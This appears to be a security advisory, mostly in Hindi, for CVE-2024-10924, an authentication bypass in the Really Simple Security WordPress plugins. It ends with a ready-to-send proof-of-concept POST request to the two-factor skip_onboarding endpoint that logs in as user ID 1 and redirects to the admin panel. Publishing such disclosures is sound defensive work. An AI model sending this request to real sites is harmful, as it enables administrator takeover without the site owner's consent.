
Really Simple Security (मुक्त, प्रो, और प्रो मल्टीसाइट) 9.0.0 – 9.1.1.1 – प्रमाणीकरण बायपास
Really Simple Security (Free, Pro, और Pro Multisite) 9.0.0 – 9.1.1.1 – प्रमाणीकरण बायपास
WordPress के लिए Really Simple Security (Free, Pro, और Pro Multisite) प्लगइन्स संस्करण 9.0.0 से 9.1.1.1 तक प्रमाणीकरण बायपास के प्रति संवेदनशील हैं। यह दो-कारक REST API क्रियाओं में 'check_login_and_get_user' फ़ंक्शन के साथ अनुचित उपयोगकर्ता जाँच त्रुटि प्रबंधन के कारण होता है। इससे अनधिकृत हमलावरों के लिए साइट पर किसी भी मौजूदा उपयोगकर्ता, जैसे कि एक प्रशासक, के रूप में लॉग इन करना संभव हो जाता है, जब "दो-कारक प्रमाणीकरण" सेटिंग सक्षम होती है (डिफ़ॉल्ट रूप से अक्षम)।
CVSS VectorCVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
CVE CVE-2024-10924
CVSS 9.8 (Critical)
Publicly Published November 14, 2024
Last Updated November 14, 2024
Researcher István Márton - Wordfence
POST /wp-json/reallysimplessl/v1/two_fa/skip_onboarding HTTP/1.1
Host: kubernetes.docker.internal
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:132.0) Gecko/20100101 Firefox/132.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/json;
Connection: keep-alive
Content-Length: 90
{
"user_id":1,
"login_nonce": "231231231",
"redirect_to": "/wp-admin/"
}